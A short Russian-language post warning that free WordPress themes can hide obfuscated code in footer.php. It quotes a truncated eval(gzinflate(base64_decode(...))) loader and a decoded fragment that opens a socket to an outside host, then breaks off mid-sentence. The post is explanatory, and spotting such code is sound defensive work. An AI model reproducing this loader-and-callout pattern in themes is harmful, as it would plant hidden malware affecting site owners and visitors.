Многие из вас замечали, что в бесплатных темах wordpress авторы шифруют свои копирайты. Код в футере темы (footer.php) выглядит закодированным примерно так:
eval(gzinflate(base64_decode(’FZrHErPasYVfxTMfFwNyqmv7FDnnJJi4iCKLnJ7+8msmBq
Но бывает, что в футер таким образом подгружают реальный исполняемый код.
После декодирования (функция, base64_decode), текст может уже выглядеть более подозрительно
if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen(”www.domen.com”, 80
Внедряя ява-скрипт на страницу, злоумышленники могут крутить рекламу, а самое неприятное – [...]